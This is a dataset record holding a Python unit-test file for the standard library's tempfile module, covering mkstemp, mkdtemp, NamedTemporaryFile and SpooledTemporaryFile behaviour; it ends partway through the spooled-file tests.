blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 257 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f7d8f662b47b19b1207a866a5facfa1516f5aeb8 | 02680f3057c3acd9c5a70474d37f76ac9fe39cd2 | /Python Environment Setup/Alternate/1. Python/1. Installer/Python-3.4.0(Linux)/Lib/test/test_tempfile.py | cf2ae080bed9269d4cb4c40d27e964fefb779988 | [
"Apache-2.0",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-python-cwi",
"GPL-1.0-or-later",
"LicenseRef-scancode-other-copyleft",
"Python-2.0"
] | permissive | tpsatish95/Python-Workshop | 1b43e25487b48d51185947e244845b41f199da6f | 5f4da07c96cfd0ae76a502efc8acb94409347946 | refs/heads/master | 2022-11-04T02:31:49.286334 | 2017-02-26T13:35:29 | 2017-02-26T13:35:29 | 44,395,862 | 1 | 2 | Apache-2.0 | 2022-10-21T00:22:22 | 2015-10-16T16:02:24 | Python | UTF-8 | Python | false | false | 41,583 | py | # tempfile.py unit tests.
import tempfile
import errno
import io
import os
import signal
import sys
import re
import warnings
import contextlib
import weakref
import unittest
from test import support, script_helper
# Feature probes: record which optional OS facilities are present so
# individual tests can be skipped cleanly on platforms lacking them.
if hasattr(os, 'stat'):
    import stat
    has_stat = 1
else:
    has_stat = 0
# True when the platform distinguishes text from binary open flags
# (i.e. O_TEXT exists, as on Windows).
has_textmode = (tempfile._text_openflags != tempfile._bin_openflags)
has_spawnl = hasattr(os, 'spawnl')
# TEST_FILES may need to be tweaked for systems depending on the maximum
# number of files that can be opened at one time (see ulimit -n)
if sys.platform.startswith('openbsd'):
    TEST_FILES = 48
else:
    TEST_FILES = 100
# This is organized as one test for each chunk of code in tempfile.py,
# in order of their appearance in the file. Testing which requires
# threads is not done here.
# Common functionality.
class BaseTestCase(unittest.TestCase):
    """Shared fixture: suppress mktemp RuntimeWarnings and provide
    nameCheck(), which validates a generated temp-file name against the
    directory/prefix/suffix it was requested with."""

    # Pattern the random portion of a generated name must match.
    str_check = re.compile(r"^[a-z0-9_-]{8}$")

    def setUp(self):
        # Enter a check_warnings context manually so tearDown can close
        # it; filter out the RuntimeWarning that mktemp() emits.
        self._warnings_manager = support.check_warnings()
        self._warnings_manager.__enter__()
        warnings.filterwarnings("ignore", category=RuntimeWarning,
                                message="mktemp", module=__name__)

    def tearDown(self):
        self._warnings_manager.__exit__(None, None, None)

    def nameCheck(self, name, dir, pre, suf):
        """Assert that *name* lives in *dir*, starts with *pre*, ends with
        *suf*, and has a random middle matching str_check."""
        (ndir, nbase) = os.path.split(name)
        npre = nbase[:len(pre)]
        nsuf = nbase[len(nbase)-len(suf):]
        # check for equality of the absolute paths!
        self.assertEqual(os.path.abspath(ndir), os.path.abspath(dir),
                         "file '%s' not in directory '%s'" % (name, dir))
        self.assertEqual(npre, pre,
                         "file '%s' does not begin with '%s'" % (nbase, pre))
        self.assertEqual(nsuf, suf,
                         "file '%s' does not end with '%s'" % (nbase, suf))
        # Strip prefix/suffix to leave only the random middle portion.
        nbase = nbase[len(pre):len(nbase)-len(suf)]
        self.assertTrue(self.str_check.match(nbase),
                        "random string '%s' does not match ^[a-z0-9_-]{8}$"
                        % nbase)
class TestExports(BaseTestCase):
    """Check the tempfile module's public namespace."""

    def test_exports(self):
        # There are no surprising symbols in the tempfile module.
        # Fixed: the original bound the module namespace to a local named
        # `dict`, shadowing the builtin; use non-shadowing names and a set.
        expected = {
            "NamedTemporaryFile",
            "TemporaryFile",
            "mkstemp",
            "mkdtemp",
            "mktemp",
            "TMP_MAX",
            "gettempprefix",
            "gettempdir",
            "tempdir",
            "template",
            "SpooledTemporaryFile",
            "TemporaryDirectory",
        }
        unexp = [key for key in tempfile.__dict__
                 if not key.startswith('_') and key not in expected]
        self.assertTrue(len(unexp) == 0,
                        "unexpected keys: %s" % unexp)
class TestRandomNameSequence(BaseTestCase):
    """Test the internal iterator object _RandomNameSequence."""

    def setUp(self):
        # Build the name sequence before the base fixture installs its
        # warnings filter.
        self.r = tempfile._RandomNameSequence()
        super().setUp()

    def test_get_six_char_str(self):
        # _RandomNameSequence returns a six-character string
        # NOTE(review): str_check in BaseTestCase matches *eight*
        # characters, so the method name/comment look stale -- confirm.
        s = next(self.r)
        self.nameCheck(s, '', '', '')

    def test_many(self):
        # _RandomNameSequence returns no duplicate strings (stochastic)
        dict = {}
        r = self.r
        for i in range(TEST_FILES):
            s = next(r)
            self.nameCheck(s, '', '', '')
            self.assertNotIn(s, dict)
            dict[s] = 1

    def supports_iter(self):
        # NOTE(review): missing the "test_" prefix, so unittest discovery
        # never runs this method -- confirm whether that is intentional.
        # _RandomNameSequence supports the iterator protocol
        i = 0
        r = self.r
        for s in r:
            i += 1
            if i == 20:
                break

    @unittest.skipUnless(hasattr(os, 'fork'),
        "os.fork is required for this test")
    def test_process_awareness(self):
        # ensure that the random source differs between
        # child and parent.
        read_fd, write_fd = os.pipe()
        pid = None
        try:
            pid = os.fork()
            if not pid:
                # Child: send one generated name back through the pipe,
                # then hard-exit to avoid running parent cleanup handlers.
                os.close(read_fd)
                os.write(write_fd, next(self.r).encode("ascii"))
                os.close(write_fd)
                # bypass the normal exit handlers- leave those to
                # the parent.
                os._exit(0)
            parent_value = next(self.r)
            child_value = os.read(read_fd, len(parent_value)).decode("ascii")
        finally:
            if pid:
                # best effort to ensure the process can't bleed out
                # via any bugs above
                try:
                    os.kill(pid, signal.SIGKILL)
                except OSError:
                    pass
            os.close(read_fd)
            os.close(write_fd)
        self.assertNotEqual(child_value, parent_value)
class TestCandidateTempdirList(BaseTestCase):
    """Test the internal function _candidate_tempdir_list."""

    def test_nonempty_list(self):
        # _candidate_tempdir_list returns a nonempty list of strings
        cand = tempfile._candidate_tempdir_list()
        self.assertFalse(len(cand) == 0)
        for c in cand:
            self.assertIsInstance(c, str)

    def test_wanted_dirs(self):
        # _candidate_tempdir_list contains the expected directories
        # Make sure the interesting environment variables are all set.
        with support.EnvironmentVarGuard() as env:
            for envname in 'TMPDIR', 'TEMP', 'TMP':
                dirname = os.getenv(envname)
                if not dirname:
                    env[envname] = os.path.abspath(envname)
            cand = tempfile._candidate_tempdir_list()
            for envname in 'TMPDIR', 'TEMP', 'TMP':
                dirname = os.getenv(envname)
                if not dirname:
                    # Fixed: report a proper test failure instead of the
                    # original bare `raise ValueError`, which surfaced as
                    # an error with no explanation.
                    self.fail("%s environment variable unexpectedly unset"
                              % envname)
                self.assertIn(dirname, cand)
            try:
                dirname = os.getcwd()
            except (AttributeError, OSError):
                dirname = os.curdir
            self.assertIn(dirname, cand)
        # Not practical to try to verify the presence of OS-specific
        # paths in this list.
# We test _get_default_tempdir some more by testing gettempdir.
# We test _get_default_tempdir some more by testing gettempdir.
class TestGetDefaultTempdir(BaseTestCase):
    """Test _get_default_tempdir()."""

    def test_no_files_left_behind(self):
        # use a private empty directory
        with tempfile.TemporaryDirectory() as our_temp_directory:
            # force _get_default_tempdir() to consider our empty directory
            def our_candidate_list():
                return [our_temp_directory]

            with support.swap_attr(tempfile, "_candidate_tempdir_list",
                                   our_candidate_list):
                # verify our directory is empty after _get_default_tempdir()
                tempfile._get_default_tempdir()
                self.assertEqual(os.listdir(our_temp_directory), [])

                def raise_OSError(*args, **kwargs):
                    raise OSError()

                with support.swap_attr(io, "open", raise_OSError):
                    # test again with failing io.open()
                    with self.assertRaises(FileNotFoundError):
                        tempfile._get_default_tempdir()
                    self.assertEqual(os.listdir(our_temp_directory), [])

                # Capture the *real* io.open before patching it, so
                # bad_writer can still create the probe file and only its
                # write() fails.
                open = io.open
                def bad_writer(*args, **kwargs):
                    fp = open(*args, **kwargs)
                    fp.write = raise_OSError
                    return fp

                with support.swap_attr(io, "open", bad_writer):
                    # test again with failing write()
                    with self.assertRaises(FileNotFoundError):
                        tempfile._get_default_tempdir()
                    self.assertEqual(os.listdir(our_temp_directory), [])
class TestGetCandidateNames(BaseTestCase):
    """Test the internal function _get_candidate_names."""

    def test_retval(self):
        # _get_candidate_names returns a _RandomNameSequence object
        obj = tempfile._get_candidate_names()
        self.assertIsInstance(obj, tempfile._RandomNameSequence)

    def test_same_thing(self):
        # _get_candidate_names always returns the same object
        a = tempfile._get_candidate_names()
        b = tempfile._get_candidate_names()
        # Fixed: assertIs gives a useful failure message, unlike
        # assertTrue(a is b) which only reports "False is not true".
        self.assertIs(a, b)
@contextlib.contextmanager
def _inside_empty_temp_dir():
    """Context manager: point tempfile.tempdir at a fresh empty directory
    for the duration of the block, then remove the directory (and anything
    the test left in it) on exit."""
    dir = tempfile.mkdtemp()
    try:
        with support.swap_attr(tempfile, 'tempdir', dir):
            yield
    finally:
        support.rmtree(dir)
def _mock_candidate_names(*names):
    """Return a context manager that patches
    tempfile._get_candidate_names so it yields exactly *names*."""
    def fixed_sequence():
        return iter(names)
    return support.swap_attr(tempfile,
                             '_get_candidate_names',
                             fixed_sequence)
class TestMkstempInner(BaseTestCase):
    """Test the internal function _mkstemp_inner."""

    class mkstemped:
        """Wrapper around a _mkstemp_inner file that deletes it on GC.

        The cleanup callables are bound at class-definition time,
        presumably so __del__ still works if module globals have been
        torn down -- TODO confirm.
        """
        _bflags = tempfile._bin_openflags
        _tflags = tempfile._text_openflags
        _close = os.close
        _unlink = os.unlink

        def __init__(self, dir, pre, suf, bin):
            if bin: flags = self._bflags
            else: flags = self._tflags
            (self.fd, self.name) = tempfile._mkstemp_inner(dir, pre, suf, flags)

        def write(self, str):
            os.write(self.fd, str)

        def __del__(self):
            self._close(self.fd)
            self._unlink(self.name)

    def do_create(self, dir=None, pre="", suf="", bin=1):
        # Create a file via _mkstemp_inner, check its name, and return the
        # self-cleaning wrapper.
        if dir is None:
            dir = tempfile.gettempdir()
        file = self.mkstemped(dir, pre, suf, bin)
        self.nameCheck(file.name, dir, pre, suf)
        return file

    def test_basic(self):
        # _mkstemp_inner can create files
        self.do_create().write(b"blat")
        self.do_create(pre="a").write(b"blat")
        self.do_create(suf="b").write(b"blat")
        self.do_create(pre="a", suf="b").write(b"blat")
        self.do_create(pre="aa", suf=".txt").write(b"blat")

    def test_basic_many(self):
        # _mkstemp_inner can create many files (stochastic)
        extant = list(range(TEST_FILES))
        for i in extant:
            extant[i] = self.do_create(pre="aa")

    def test_choose_directory(self):
        # _mkstemp_inner can create files in a user-selected directory
        dir = tempfile.mkdtemp()
        try:
            self.do_create(dir=dir).write(b"blat")
        finally:
            os.rmdir(dir)

    @unittest.skipUnless(has_stat, 'os.stat not available')
    def test_file_mode(self):
        # _mkstemp_inner creates files with the proper mode
        file = self.do_create()
        mode = stat.S_IMODE(os.stat(file.name).st_mode)
        expected = 0o600
        if sys.platform == 'win32':
            # There's no distinction among 'user', 'group' and 'world';
            # replicate the 'user' bits.
            user = expected >> 6
            expected = user * (1 + 8 + 64)
        self.assertEqual(mode, expected)

    @unittest.skipUnless(has_spawnl, 'os.spawnl not available')
    def test_noinherit(self):
        # _mkstemp_inner file handles are not inherited by child processes
        if support.verbose:
            v="v"
        else:
            v="q"

        file = self.do_create()
        self.assertEqual(os.get_inheritable(file.fd), False)
        fd = "%d" % file.fd

        try:
            me = __file__
        except NameError:
            me = sys.argv[0]

        # We have to exec something, so that FD_CLOEXEC will take
        # effect.  The core of this test is therefore in
        # tf_inherit_check.py, which see.
        tester = os.path.join(os.path.dirname(os.path.abspath(me)),
                              "tf_inherit_check.py")

        # On Windows a spawn* /path/ with embedded spaces shouldn't be quoted,
        # but an arg with embedded spaces should be decorated with double
        # quotes on each end
        if sys.platform == 'win32':
            decorated = '"%s"' % sys.executable
            tester = '"%s"' % tester
        else:
            decorated = sys.executable

        retval = os.spawnl(os.P_WAIT, sys.executable, decorated, tester, v, fd)
        self.assertFalse(retval < 0,
                    "child process caught fatal signal %d" % -retval)
        self.assertFalse(retval > 0, "child process reports failure %d"%retval)

    @unittest.skipUnless(has_textmode, "text mode not available")
    def test_textmode(self):
        # _mkstemp_inner can create files in text mode
        # A text file is truncated at the first Ctrl+Z byte
        f = self.do_create(bin=0)
        f.write(b"blat\x1a")
        f.write(b"extra\n")
        os.lseek(f.fd, 0, os.SEEK_SET)
        self.assertEqual(os.read(f.fd, 20), b"blat")

    def default_mkstemp_inner(self):
        # Helper: call _mkstemp_inner with all-default arguments.
        return tempfile._mkstemp_inner(tempfile.gettempdir(),
                                       tempfile.template,
                                       '',
                                       tempfile._bin_openflags)

    def test_collision_with_existing_file(self):
        # _mkstemp_inner tries another name when a file with
        # the chosen name already exists
        with _inside_empty_temp_dir(), \
             _mock_candidate_names('aaa', 'aaa', 'bbb'):
            (fd1, name1) = self.default_mkstemp_inner()
            os.close(fd1)
            self.assertTrue(name1.endswith('aaa'))

            (fd2, name2) = self.default_mkstemp_inner()
            os.close(fd2)
            self.assertTrue(name2.endswith('bbb'))

    def test_collision_with_existing_directory(self):
        # _mkstemp_inner tries another name when a directory with
        # the chosen name already exists
        with _inside_empty_temp_dir(), \
             _mock_candidate_names('aaa', 'aaa', 'bbb'):
            dir = tempfile.mkdtemp()
            self.assertTrue(dir.endswith('aaa'))

            (fd, name) = self.default_mkstemp_inner()
            os.close(fd)
            self.assertTrue(name.endswith('bbb'))
class TestGetTempPrefix(BaseTestCase):
    """Test gettempprefix()."""

    def test_sane_template(self):
        # gettempprefix returns a nonempty prefix string
        prefix = tempfile.gettempprefix()
        self.assertIsInstance(prefix, str)
        self.assertTrue(len(prefix) > 0)

    def test_usable_template(self):
        # gettempprefix returns a usable prefix string
        # Create a temp directory, avoiding use of the prefix.
        # Then attempt to create a file whose name is
        # prefix + 'xxxxxx.xxx' in that directory.
        candidate = tempfile.gettempprefix() + "xxxxxx.xxx"
        workdir = tempfile.mkdtemp(prefix="")
        try:
            candidate = os.path.join(workdir, candidate)
            fd = os.open(candidate, os.O_RDWR | os.O_CREAT)
            os.close(fd)
            os.unlink(candidate)
        finally:
            os.rmdir(workdir)
class TestGetTempDir(BaseTestCase):
    """Test gettempdir()."""

    def test_directory_exists(self):
        # gettempdir returns a directory which exists
        dir = tempfile.gettempdir()
        self.assertTrue(os.path.isabs(dir) or dir == os.curdir,
                        "%s is not an absolute path" % dir)
        self.assertTrue(os.path.isdir(dir),
                        "%s is not a directory" % dir)

    def test_directory_writable(self):
        # gettempdir returns a directory writable by the user
        # sneaky: just instantiate a NamedTemporaryFile, which
        # defaults to writing into the directory returned by
        # gettempdir.
        file = tempfile.NamedTemporaryFile()
        file.write(b"blat")
        file.close()

    def test_same_thing(self):
        # gettempdir always returns the same object
        a = tempfile.gettempdir()
        b = tempfile.gettempdir()
        # Fixed: assertIs reports both operands on failure, unlike the
        # original assertTrue(a is b).
        self.assertIs(a, b)

    def test_case_sensitive(self):
        # gettempdir should not flatten its case
        # even on a case-insensitive file system
        case_sensitive_tempdir = tempfile.mkdtemp("-Temp")
        # Clear the cached value so gettempdir() recomputes it from the
        # environment; restore it in the finally block.
        _tempdir, tempfile.tempdir = tempfile.tempdir, None
        try:
            with support.EnvironmentVarGuard() as env:
                # Fake the first env var which is checked as a candidate
                env["TMPDIR"] = case_sensitive_tempdir
                self.assertEqual(tempfile.gettempdir(), case_sensitive_tempdir)
        finally:
            tempfile.tempdir = _tempdir
            support.rmdir(case_sensitive_tempdir)
class TestMkstemp(BaseTestCase):
    """Test mkstemp()."""

    def do_create(self, dir=None, pre="", suf=""):
        # Resolve the target directory, create the file, validate its
        # name, and always clean it up afterwards.
        target = tempfile.gettempdir() if dir is None else dir
        fd, name = tempfile.mkstemp(dir=target, prefix=pre, suffix=suf)
        ndir, nbase = os.path.split(name)
        adir = os.path.abspath(target)
        self.assertEqual(adir, ndir,
            "Directory '%s' incorrectly returned as '%s'" % (adir, ndir))
        try:
            self.nameCheck(name, target, pre, suf)
        finally:
            os.close(fd)
            os.unlink(name)

    def test_basic(self):
        # mkstemp can create files
        for kwargs in ({},
                       {"pre": "a"},
                       {"suf": "b"},
                       {"pre": "a", "suf": "b"},
                       {"pre": "aa", "suf": ".txt"},
                       {"dir": "."}):
            self.do_create(**kwargs)

    def test_choose_directory(self):
        # mkstemp can create directories in a user-selected directory
        parent = tempfile.mkdtemp()
        try:
            self.do_create(dir=parent)
        finally:
            os.rmdir(parent)
class TestMkdtemp(BaseTestCase):
    """Test mkdtemp()."""

    def do_create(self, dir=None, pre="", suf=""):
        # Create a directory, validate its name, and return it; on a
        # validation failure remove it before re-raising so nothing leaks.
        if dir is None:
            dir = tempfile.gettempdir()
        name = tempfile.mkdtemp(dir=dir, prefix=pre, suffix=suf)

        try:
            self.nameCheck(name, dir, pre, suf)
            return name
        except:
            os.rmdir(name)
            raise

    def test_basic(self):
        # mkdtemp can create directories
        os.rmdir(self.do_create())
        os.rmdir(self.do_create(pre="a"))
        os.rmdir(self.do_create(suf="b"))
        os.rmdir(self.do_create(pre="a", suf="b"))
        os.rmdir(self.do_create(pre="aa", suf=".txt"))

    def test_basic_many(self):
        # mkdtemp can create many directories (stochastic)
        extant = list(range(TEST_FILES))
        try:
            for i in extant:
                extant[i] = self.do_create(pre="aa")
        finally:
            # Entries still holding their original int placeholder were
            # never created; only remove the ones that became paths.
            for i in extant:
                if(isinstance(i, str)):
                    os.rmdir(i)

    def test_choose_directory(self):
        # mkdtemp can create directories in a user-selected directory
        dir = tempfile.mkdtemp()
        try:
            os.rmdir(self.do_create(dir=dir))
        finally:
            os.rmdir(dir)

    @unittest.skipUnless(has_stat, 'os.stat not available')
    def test_mode(self):
        # mkdtemp creates directories with the proper mode
        dir = self.do_create()
        try:
            mode = stat.S_IMODE(os.stat(dir).st_mode)
            mode &= 0o777 # Mask off sticky bits inherited from /tmp
            expected = 0o700
            if sys.platform == 'win32':
                # There's no distinction among 'user', 'group' and 'world';
                # replicate the 'user' bits.
                user = expected >> 6
                expected = user * (1 + 8 + 64)
            self.assertEqual(mode, expected)
        finally:
            os.rmdir(dir)

    def test_collision_with_existing_file(self):
        # mkdtemp tries another name when a file with
        # the chosen name already exists
        with _inside_empty_temp_dir(), \
             _mock_candidate_names('aaa', 'aaa', 'bbb'):
            file = tempfile.NamedTemporaryFile(delete=False)
            file.close()
            self.assertTrue(file.name.endswith('aaa'))
            dir = tempfile.mkdtemp()
            self.assertTrue(dir.endswith('bbb'))

    def test_collision_with_existing_directory(self):
        # mkdtemp tries another name when a directory with
        # the chosen name already exists
        with _inside_empty_temp_dir(), \
             _mock_candidate_names('aaa', 'aaa', 'bbb'):
            dir1 = tempfile.mkdtemp()
            self.assertTrue(dir1.endswith('aaa'))
            dir2 = tempfile.mkdtemp()
            self.assertTrue(dir2.endswith('bbb'))
class TestMktemp(BaseTestCase):
    """Test mktemp()."""

    # For safety, all use of mktemp must occur in a private directory.
    # We *also* test the warning behavior of mktemp (issue 14364).

    def setUp(self):
        self.dir = tempfile.mkdtemp()
        super().setUp()

    def tearDown(self):
        if self.dir:
            os.rmdir(self.dir)
            self.dir = None
        super().tearDown()

    class mktemped:
        """Claim a mktemp() name by creating the file, unlink it on GC.

        _unlink is bound at class level, presumably so __del__ still
        works during interpreter shutdown -- TODO confirm.
        """
        _unlink = os.unlink
        _bflags = tempfile._bin_openflags

        def __init__(self, dir, pre, suf):
            self.name = tempfile.mktemp(dir=dir, prefix=pre, suffix=suf)
            # Create the file.  This will raise an exception if it's
            # mysteriously appeared in the meanwhile.
            os.close(os.open(self.name, self._bflags, 0o600))

        def __del__(self):
            self._unlink(self.name)

    def do_create(self, pre="", suf=""):
        file = self.mktemped(self.dir, pre, suf)
        self.nameCheck(file.name, self.dir, pre, suf)
        return file

    def test_basic(self):
        # mktemp can choose usable file names
        self.do_create()
        self.do_create(pre="a")
        self.do_create(suf="b")
        self.do_create(pre="a", suf="b")
        self.do_create(pre="aa", suf=".txt")

    def test_many(self):
        # mktemp can choose many usable file names (stochastic)
        extant = list(range(TEST_FILES))
        for i in extant:
            extant[i] = self.do_create(pre="aa")

##     def test_warning(self):
##         # mktemp issues a warning when used
##         warnings.filterwarnings("error",
##                                 category=RuntimeWarning,
##                                 message="mktemp")
##         self.assertRaises(RuntimeWarning,
##                           tempfile.mktemp, dir=self.dir)
# We test _TemporaryFileWrapper by testing NamedTemporaryFile.
# We test _TemporaryFileWrapper by testing NamedTemporaryFile.
class TestNamedTemporaryFile(BaseTestCase):
    """Test NamedTemporaryFile()."""

    def do_create(self, dir=None, pre="", suf="", delete=True):
        # Create a NamedTemporaryFile, validate its name, and return it.
        if dir is None:
            dir = tempfile.gettempdir()
        file = tempfile.NamedTemporaryFile(dir=dir, prefix=pre, suffix=suf,
                                           delete=delete)

        self.nameCheck(file.name, dir, pre, suf)
        return file

    def test_basic(self):
        # NamedTemporaryFile can create files
        self.do_create()
        self.do_create(pre="a")
        self.do_create(suf="b")
        self.do_create(pre="a", suf="b")
        self.do_create(pre="aa", suf=".txt")

    def test_method_lookup(self):
        # Issue #18879: Looking up a temporary file method should keep it
        # alive long enough.
        # This is refcount-sensitive: the bound methods must keep the
        # wrapper alive after the last direct reference is dropped.
        f = self.do_create()
        wr = weakref.ref(f)
        write = f.write
        write2 = f.write
        del f
        write(b'foo')
        del write
        write2(b'bar')
        del write2
        if support.check_impl_detail(cpython=True):
            # No reference cycle was created.
            self.assertIsNone(wr())

    def test_creates_named(self):
        # NamedTemporaryFile creates files with names
        f = tempfile.NamedTemporaryFile()
        self.assertTrue(os.path.exists(f.name),
                        "NamedTemporaryFile %s does not exist" % f.name)

    def test_del_on_close(self):
        # A NamedTemporaryFile is deleted when closed
        dir = tempfile.mkdtemp()
        try:
            f = tempfile.NamedTemporaryFile(dir=dir)
            f.write(b'blat')
            f.close()
            self.assertFalse(os.path.exists(f.name),
                        "NamedTemporaryFile %s exists after close" % f.name)
        finally:
            os.rmdir(dir)

    def test_dis_del_on_close(self):
        # Tests that delete-on-close can be disabled
        dir = tempfile.mkdtemp()
        tmp = None
        try:
            f = tempfile.NamedTemporaryFile(dir=dir, delete=False)
            tmp = f.name
            f.write(b'blat')
            f.close()
            self.assertTrue(os.path.exists(f.name),
                        "NamedTemporaryFile %s missing after close" % f.name)
        finally:
            if tmp is not None:
                os.unlink(tmp)
            os.rmdir(dir)

    def test_multiple_close(self):
        # A NamedTemporaryFile can be closed many times without error
        f = tempfile.NamedTemporaryFile()
        f.write(b'abc\n')
        f.close()
        f.close()
        f.close()

    def test_context_manager(self):
        # A NamedTemporaryFile can be used as a context manager
        with tempfile.NamedTemporaryFile() as f:
            self.assertTrue(os.path.exists(f.name))
        self.assertFalse(os.path.exists(f.name))
        # Re-entering a closed file must raise ValueError.
        def use_closed():
            with f:
                pass
        self.assertRaises(ValueError, use_closed)

    # How to test the mode and bufsize parameters?
# How to test the mode and bufsize parameters?
class TestSpooledTemporaryFile(BaseTestCase):
    """Test SpooledTemporaryFile().

    These tests track the private _rolled flag to verify exactly when the
    in-memory buffer spills over to a real on-disk file.
    """

    def do_create(self, max_size=0, dir=None, pre="", suf=""):
        if dir is None:
            dir = tempfile.gettempdir()
        file = tempfile.SpooledTemporaryFile(max_size=max_size, dir=dir, prefix=pre, suffix=suf)

        return file

    def test_basic(self):
        # SpooledTemporaryFile can create files
        f = self.do_create()
        self.assertFalse(f._rolled)
        f = self.do_create(max_size=100, pre="a", suf=".txt")
        self.assertFalse(f._rolled)

    def test_del_on_close(self):
        # A SpooledTemporaryFile is deleted when closed
        dir = tempfile.mkdtemp()
        try:
            f = tempfile.SpooledTemporaryFile(max_size=10, dir=dir)
            self.assertFalse(f._rolled)
            f.write(b'blat ' * 5)
            self.assertTrue(f._rolled)
            filename = f.name
            f.close()
            self.assertFalse(isinstance(filename, str) and os.path.exists(filename),
                        "SpooledTemporaryFile %s exists after close" % filename)
        finally:
            os.rmdir(dir)

    def test_rewrite_small(self):
        # A SpooledTemporaryFile can be written to multiple within the max_size
        f = self.do_create(max_size=30)
        self.assertFalse(f._rolled)
        for i in range(5):
            f.seek(0, 0)
            f.write(b'x' * 20)
        self.assertFalse(f._rolled)

    def test_write_sequential(self):
        # A SpooledTemporaryFile should hold exactly max_size bytes, and roll
        # over afterward
        f = self.do_create(max_size=30)
        self.assertFalse(f._rolled)
        f.write(b'x' * 20)
        self.assertFalse(f._rolled)
        f.write(b'x' * 10)
        self.assertFalse(f._rolled)
        f.write(b'x')
        self.assertTrue(f._rolled)

    def test_writelines(self):
        # Verify writelines with a SpooledTemporaryFile
        f = self.do_create()
        f.writelines((b'x', b'y', b'z'))
        f.seek(0)
        buf = f.read()
        self.assertEqual(buf, b'xyz')

    def test_writelines_sequential(self):
        # A SpooledTemporaryFile should hold exactly max_size bytes, and roll
        # over afterward
        f = self.do_create(max_size=35)
        f.writelines((b'x' * 20, b'x' * 10, b'x' * 5))
        self.assertFalse(f._rolled)
        f.write(b'x')
        self.assertTrue(f._rolled)

    def test_sparse(self):
        # A SpooledTemporaryFile that is written late in the file will extend
        # when that occurs
        f = self.do_create(max_size=30)
        self.assertFalse(f._rolled)
        f.seek(100, 0)
        self.assertFalse(f._rolled)
        f.write(b'x')
        self.assertTrue(f._rolled)

    def test_fileno(self):
        # A SpooledTemporaryFile should roll over to a real file on fileno()
        f = self.do_create(max_size=30)
        self.assertFalse(f._rolled)
        self.assertTrue(f.fileno() > 0)
        self.assertTrue(f._rolled)

    def test_multiple_close_before_rollover(self):
        # A SpooledTemporaryFile can be closed many times without error
        f = tempfile.SpooledTemporaryFile()
        f.write(b'abc\n')
        self.assertFalse(f._rolled)
        f.close()
        f.close()
        f.close()

    def test_multiple_close_after_rollover(self):
        # A SpooledTemporaryFile can be closed many times without error
        f = tempfile.SpooledTemporaryFile(max_size=1)
        f.write(b'abc\n')
        self.assertTrue(f._rolled)
        f.close()
        f.close()
        f.close()

    def test_bound_methods(self):
        # It should be OK to steal a bound method from a SpooledTemporaryFile
        # and use it independently; when the file rolls over, those bound
        # methods should continue to function
        f = self.do_create(max_size=30)
        read = f.read
        write = f.write
        seek = f.seek

        write(b"a" * 35)
        write(b"b" * 35)
        seek(0, 0)
        self.assertEqual(read(70), b'a'*35 + b'b'*35)

    def test_properties(self):
        # mode/name/newlines/encoding change once the file rolls over
        # from a BytesIO to a real binary file.
        f = tempfile.SpooledTemporaryFile(max_size=10)
        f.write(b'x' * 10)
        self.assertFalse(f._rolled)
        self.assertEqual(f.mode, 'w+b')
        self.assertIsNone(f.name)
        with self.assertRaises(AttributeError):
            f.newlines
        with self.assertRaises(AttributeError):
            f.encoding

        f.write(b'x')
        self.assertTrue(f._rolled)
        self.assertEqual(f.mode, 'rb+')
        self.assertIsNotNone(f.name)
        with self.assertRaises(AttributeError):
            f.newlines
        with self.assertRaises(AttributeError):
            f.encoding

    def test_text_mode(self):
        # Creating a SpooledTemporaryFile with a text mode should produce
        # a file object reading and writing (Unicode) text strings.
        f = tempfile.SpooledTemporaryFile(mode='w+', max_size=10)
        f.write("abc\n")
        f.seek(0)
        self.assertEqual(f.read(), "abc\n")
        f.write("def\n")
        f.seek(0)
        self.assertEqual(f.read(), "abc\ndef\n")
        self.assertFalse(f._rolled)
        self.assertEqual(f.mode, 'w+')
        self.assertIsNone(f.name)
        self.assertIsNone(f.newlines)
        self.assertIsNone(f.encoding)

        f.write("xyzzy\n")
        f.seek(0)
        self.assertEqual(f.read(), "abc\ndef\nxyzzy\n")
        # Check that Ctrl+Z doesn't truncate the file
        f.write("foo\x1abar\n")
        f.seek(0)
        self.assertEqual(f.read(), "abc\ndef\nxyzzy\nfoo\x1abar\n")
        self.assertTrue(f._rolled)
        self.assertEqual(f.mode, 'w+')
        self.assertIsNotNone(f.name)
        self.assertEqual(f.newlines, os.linesep)
        self.assertIsNotNone(f.encoding)

    def test_text_newline_and_encoding(self):
        # newline/encoding arguments survive the rollover to a real file.
        f = tempfile.SpooledTemporaryFile(mode='w+', max_size=10,
                                          newline='', encoding='utf-8')
        f.write("\u039B\r\n")
        f.seek(0)
        self.assertEqual(f.read(), "\u039B\r\n")
        self.assertFalse(f._rolled)
        self.assertEqual(f.mode, 'w+')
        self.assertIsNone(f.name)
        self.assertIsNone(f.newlines)
        self.assertIsNone(f.encoding)

        f.write("\u039B" * 20 + "\r\n")
        f.seek(0)
        self.assertEqual(f.read(), "\u039B\r\n" + ("\u039B" * 20) + "\r\n")
        self.assertTrue(f._rolled)
        self.assertEqual(f.mode, 'w+')
        self.assertIsNotNone(f.name)
        self.assertIsNotNone(f.newlines)
        self.assertEqual(f.encoding, 'utf-8')

    def test_context_manager_before_rollover(self):
        # A SpooledTemporaryFile can be used as a context manager
        with tempfile.SpooledTemporaryFile(max_size=1) as f:
            self.assertFalse(f._rolled)
            self.assertFalse(f.closed)
        self.assertTrue(f.closed)
        def use_closed():
            with f:
                pass
        self.assertRaises(ValueError, use_closed)

    def test_context_manager_during_rollover(self):
        # A SpooledTemporaryFile can be used as a context manager
        with tempfile.SpooledTemporaryFile(max_size=1) as f:
            self.assertFalse(f._rolled)
            f.write(b'abc\n')
            f.flush()
